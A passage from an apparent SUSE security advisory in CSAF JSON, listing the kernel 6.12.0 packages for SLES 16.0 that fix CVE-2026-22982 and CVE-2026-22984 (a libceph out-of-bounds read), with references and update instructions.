"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
